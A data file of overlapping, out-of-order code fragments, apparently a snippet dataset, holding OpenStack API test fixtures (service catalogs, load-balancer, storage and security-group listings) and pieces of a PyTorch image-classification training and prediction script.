"'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity' }, {",
"'endpoints_links': [], 'name': 'Metering service', 'type': 'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777',",
"[ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\":",
"u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [",
"PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST",
"STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 =",
"} ] } SECGROUPS_LIST = { \"security_groups\": [ { \"description\": \"Custom Security Group\",",
"\"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\",",
"u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby',",
"TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL",
"\"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\": [ {",
"} ] } METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter",
"\"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\":",
"'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"{'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"]",
"LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating",
"{ \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ {"
] |
[
"f'Epoch: {epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552",
"image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'valid']} dataloaders =",
"{best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param img_path: Path of image to",
"'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs from config file",
"= {val: key for key, val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\"",
"255 mean = np.array([0.485, 0.456, 0.406]) # provided mean std = np.array([0.229, 0.224,",
"= time.time() best_epoch = -1 for epoch in range(num_epochs): valid_loss = 0.0 train_loss",
"print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param",
"iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels =",
"torchvision import datasets,models import math import torch.optim as optim from torch.optim import lr_scheduler",
"%', end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1",
"torch.optim as optim from torch.optim import lr_scheduler import copy import time from PIL",
"model: Model type object :param criterion: Loss function :param optimizer: Optimizer :param num_epochs:",
"end='\\r') else: print() with torch.no_grad(): model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs",
"= np.array([0.229, 0.224, 0.225]) # provided std img = (img - mean) /",
"np.array(img) / 255 mean = np.array([0.485, 0.456, 0.406]) # provided mean std =",
"print(f'Accuracy : {100 * running_corrects / len_val1} %') if valid_loss < min_val_loss: min_val_loss",
"import yaml import numpy as np # linear algebra import pandas as pd",
"torch import torchvision import matplotlib.pyplot as plt import seaborn as sns import torch.nn",
"{val: key for key, val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param",
"test_data = config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224,",
"Image from datetime import datetime from utils import * data_dir = '.' test_path",
"/ len_val1 if print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation",
"torchvision import matplotlib.pyplot as plt import seaborn as sns import torch.nn as nn",
"torch.cuda.is_available() else \"cpu\") # Trains Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders,",
"best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1 for epoch in range(num_epochs):",
"* (iter1 + 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with torch.no_grad():",
"# Normalize img = np.array(img) / 255 mean = np.array([0.485, 0.456, 0.406]) #",
"config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms",
"len(image_datasets[x]) for x in ['train', 'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if",
"optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model type object :param criterion:",
"for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels",
"top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes = [idx_to_class[idx[0]] for idx",
"list) on test folder defined by config file \"\"\" model = torch.load(model_path) device",
"= torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss += loss.item() * inputs.size(0) running_corrects +=",
"min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1 for",
"return img # Load test dataset from class defined in utils test_dataset =",
"logps = model(images) ps = torch.exp(logps) # Top indices _, top_indices = ps.topk(1)",
"valid_loss += loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100",
"epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch:",
"['train', 'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") #",
"bottom_margin, right_margin, top_margin)) # Normalize img = np.array(img) / 255 mean = np.array([0.485,",
"model_path: Path of Model used for prediction :param dataloader: Test DataLoader :param print_progress:",
"= TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to idx",
"\"\"\" :param img_path: Path of image to be processed :returns processed numpy array",
"object :param criterion: Loss function :param optimizer: Optimizer :param num_epochs: Number of epochs",
"224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } #",
"best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}')",
"torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions = {}",
"True, num_workers=0) for x in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for x",
"transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } # Load dataloaders image_datasets = {x:",
"transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize",
"std=[0.229, 0.224, 0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(),",
"'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x in ['train',",
"print_progress=False): \"\"\" :param model: Model type object :param criterion: Loss function :param optimizer:",
"= torch.max(out, 1) # out = torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step()",
"torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains Model def train_model2(model, criterion, optimizer, num_epochs=3,",
"print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy : {100",
"0.0 train_loss = 0.0 model.train() running_corrects = 0 for iter1, (inputs, labels) in",
"== 0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps = model(images) ps =",
"TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to idx dictionary",
"learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data",
"torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss += loss.item() * inputs.size(0) running_corrects += torch.sum(preds1",
"print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else:",
"> img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop Image left_margin = (img.width",
"transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)),",
"+= loss.item() * inputs.size(0) # running_corrects += torch.sum(preds == labels.data) if print_progress: print(",
"ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes = [idx_to_class[idx[0]] for",
"]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } # Load dataloaders image_datasets",
"f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time()",
"= torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains Model def train_model2(model, criterion, optimizer,",
"len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with torch.no_grad(): model.eval() for iter2, (inputs, labels)",
"torch.no_grad(): model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs =",
"dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model type object :param criterion: Loss function",
"# output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss += loss.item() * inputs.size(0)",
"= pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs from",
"Model type object :param criterion: Loss function :param optimizer: Optimizer :param num_epochs: Number",
"len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss = valid_loss / len_val1 if print_progress:",
"else: img.thumbnail((256, 10000)) # Crop Image left_margin = (img.width - 224) / 2",
"used for prediction :param dataloader: Test DataLoader :param print_progress: Prints progress if True",
"224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img = np.array(img) /",
"= {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x in ['train', 'valid']} dataset_sizes",
"preds = torch.max(out, 1) # out = torch.mul(out,100) loss = criterion(out, labels) loss.backward()",
"{} with torch.no_grad(): for ii, (images, _, img_names) in enumerate(dataloader, start=1): if print_progress:",
"{:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy : {100 * running_corrects /",
"_, preds1 = torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels)",
"0.406], std=[0.229, 0.224, 0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224),",
"0.225]) # provided std img = (img - mean) / std return img",
"std = np.array([0.229, 0.224, 0.225]) # provided std img = (img - mean)",
"running_corrects = 0 for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs",
"len(dataloader))) images = images.to(device) logps = model(images) ps = torch.exp(logps) # Top indices",
"= torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions =",
"math import torch.optim as optim from torch.optim import lr_scheduler import copy import time",
"top_margin = bottom_margin + 224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize",
"output1 = model(inputs) _, preds1 = torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss",
"= inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out",
"# Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms =",
"len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss = valid_loss / len_val1",
"Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms = {",
"{}/{}'.format(ii, len(dataloader))) images = images.to(device) logps = model(images) ps = torch.exp(logps) # Top",
"{math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,",
"model.eval() predictions = {} with torch.no_grad(): for ii, (images, _, img_names) in enumerate(dataloader,",
"_, preds = torch.max(out, 1) # out = torch.mul(out,100) loss = criterion(out, labels)",
"transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(),",
"optimizer.zero_grad() out = model(inputs) _, preds = torch.max(out, 1) # out = torch.mul(out,100)",
"img # Load test dataset from class defined in utils test_dataset = TestDataset(data_dir+'test',",
"/ 255 mean = np.array([0.485, 0.456, 0.406]) # provided mean std = np.array([0.229,",
"'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)),",
"print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r')",
"img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop Image left_margin = (img.width -",
"'.' test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x:",
"key for key, val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path:",
"Top indices _, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to",
"60)) print(f'Accuracy : {100 * running_corrects / len_val1} %') if valid_loss < min_val_loss:",
"[idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names):",
"prediction :param dataloader: Test DataLoader :param print_progress: Prints progress if True :return: Prediction(as",
":param print_progress: Prints progress if True :return: Prediction(as a list) on test folder",
"'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get",
"len_val1} %') if valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch = epoch best_model_wts",
"2 bottom_margin = (img.height - 224) / 2 right_margin = left_margin + 224",
"datetime import datetime from utils import * data_dir = '.' test_path = os.path.join(data_dir,",
"torch.max(out, 1) # out = torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step() train_loss",
"DataLoader import torchvision.transforms as transforms from torchvision import datasets,models import math import torch.optim",
"inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) output1 = model(inputs) _,",
"train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model type object",
"np.array([0.485, 0.456, 0.406]) # provided mean std = np.array([0.229, 0.224, 0.225]) # provided",
"0.456, 0.406]) # provided mean std = np.array([0.229, 0.224, 0.225]) # provided std",
"for x in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for x in ['train',",
"img = Image.open(img_path) # Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256,",
"= {x: len(image_datasets[x]) for x in ['train', 'valid']} class_names = image_datasets['train'].classes device =",
"test dataset from class defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader =",
"print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed",
"best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}')",
"of epochs :param dataloaders: Dataloaders, must be a dictionary having train and val",
"torch.sum(preds == labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1) /",
"defined by config file \"\"\" model = torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available()",
"# Load Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key",
"criterion(output1, labels) valid_loss += loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print(",
"as plt import seaborn as sns import torch.nn as nn from torch.utils.data import",
"indices to classes top_classes = [idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\" ,img_names)",
"dataloaders, print_progress=False): \"\"\" :param model: Model type object :param criterion: Loss function :param",
"for prediction :param dataloader: Test DataLoader :param print_progress: Prints progress if True :return:",
"trained model object \"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time()",
"device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions = {} with",
"torch.no_grad(): for ii, (images, _, img_names) in enumerate(dataloader, start=1): if print_progress: if ii",
"stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr']",
":param model_path: Path of Model used for prediction :param dataloader: Test DataLoader :param",
"batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data",
"as optim from torch.optim import lr_scheduler import copy import time from PIL import",
"transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)),",
"criterion: Loss function :param optimizer: Optimizer :param num_epochs: Number of epochs :param dataloaders:",
"bottom_margin = (img.height - 224) / 2 right_margin = left_margin + 224 top_margin",
"= np.array([0.485, 0.456, 0.406]) # provided mean std = np.array([0.229, 0.224, 0.225]) #",
"transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } # Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir,",
"as np # linear algebra import pandas as pd # data processing, CSV",
"in enumerate(dataloader, start=1): if print_progress: if ii % 5 == 0: print('Batch {}/{}'.format(ii,",
"5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps = model(images) ps",
"to be processed :returns processed numpy array Scales, crops, and normalizes a PIL",
"import torch.nn as nn from torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms",
":param num_epochs: Number of epochs :param dataloaders: Dataloaders, must be a dictionary having",
"x in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for",
"model(images) ps = torch.exp(logps) # Top indices _, top_indices = ps.topk(1) top_indices =",
"Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed //",
"= valid_loss / len_val1 if print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining Loss:",
"time_elapsed % 60)) print(f'Accuracy : {100 * running_corrects / len_val1} %') if valid_loss",
"pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) import os",
"Normalize img = np.array(img) / 255 mean = np.array([0.485, 0.456, 0.406]) # provided",
"# Crop Image left_margin = (img.width - 224) / 2 bottom_margin = (img.height",
"\"cpu\") # Trains Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\"",
"numpy as np # linear algebra import pandas as pd # data processing,",
"test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to",
"print() with torch.no_grad(): model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device)",
"import lr_scheduler import copy import time from PIL import Image from datetime import",
"{math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training complete in {:.0f}m",
"\"\"\" :param model: Model type object :param criterion: Loss function :param optimizer: Optimizer",
"algebra import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)",
":param print_progress: prints progress if true :return: trained model object \"\"\" min_val_loss =",
"from config file stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size']",
"import numpy as np # linear algebra import pandas as pd # data",
"bottom_margin + 224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img =",
"= config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] # Apply",
"from datetime import datetime from utils import * data_dir = '.' test_path =",
"+ 224 top_margin = bottom_margin + 224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin))",
"config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data",
"file stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate =",
"if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop Image left_margin",
"class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key for key, val in class_to_idx.items()} def",
"dataset from class defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset,",
"1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with torch.no_grad(): model.eval() for iter2,",
"progress if True :return: Prediction(as a list) on test folder defined by config",
"+= torch.sum(preds == labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1)",
"= {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'valid']} dataloaders = {x:",
"transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), }",
"# Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train',",
"import * data_dir = '.' test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv'))",
"= 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss = valid_loss",
"{epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with",
"labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels",
"'valid']} dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']} class_names = image_datasets['train'].classes",
"def process_image(img_path): \"\"\" :param img_path: Path of image to be processed :returns processed",
"(images, _, img_names) in enumerate(dataloader, start=1): if print_progress: if ii % 5 ==",
"optim from torch.optim import lr_scheduler import copy import time from PIL import Image",
"sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs from config file stream",
"Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path):",
"torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %',",
"0.0 model.train() running_corrects = 0 for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs =",
"left_margin + 224 top_margin = bottom_margin + 224 img = img.crop((left_margin, bottom_margin, right_margin,",
"array Scales, crops, and normalizes a PIL image for a PyTorch model, returns",
":return: Prediction(as a list) on test folder defined by config file \"\"\" model",
"left_margin = (img.width - 224) / 2 bottom_margin = (img.height - 224) /",
"top_indices] # print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names): predictions[img_name] = top_classes[i] print('\\nPrediction",
"inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) output1 = model(inputs) _, preds1 =",
"/ len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with torch.no_grad(): model.eval() for iter2, (inputs,",
"torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss += loss.item()",
"import copy import time from PIL import Image from datetime import datetime from",
"dictionary having train and val as keys :param print_progress: prints progress if true",
"= 0.0 model.train() running_corrects = 0 for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs",
"img_names) in enumerate(dataloader, start=1): if print_progress: if ii % 5 == 0: print('Batch",
"for epoch in range(num_epochs): valid_loss = 0.0 train_loss = 0.0 model.train() running_corrects =",
"dataloaders: Dataloaders, must be a dictionary having train and val as keys :param",
"* (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1 =",
"with torch.no_grad(): model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs",
"model def process_image(img_path): \"\"\" :param img_path: Path of image to be processed :returns",
"enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long)",
"import os import torch import torchvision import matplotlib.pyplot as plt import seaborn as",
"= torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx",
"* data_dir = '.' test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path']",
"PIL import Image from datetime import datetime from utils import * data_dir =",
"img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop Image left_margin = (img.width - 224)",
"= len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss = valid_loss / len_val1 if",
"if print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}')",
"Trains Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model:",
"yaml import numpy as np # linear algebra import pandas as pd #",
"= copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts)",
"having train and val as keys :param print_progress: prints progress if true :return:",
"valid_loss = 0.0 train_loss = 0.0 model.train() running_corrects = 0 for iter1, (inputs,",
"copy import time from PIL import Image from datetime import datetime from utils",
"ii, (images, _, img_names) in enumerate(dataloader, start=1): if print_progress: if ii % 5",
"Load Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key for",
"copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1 for epoch in range(num_epochs): valid_loss =",
"file I/O (e.g. pd.read_csv) import os import torch import torchvision import matplotlib.pyplot as",
"in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels =",
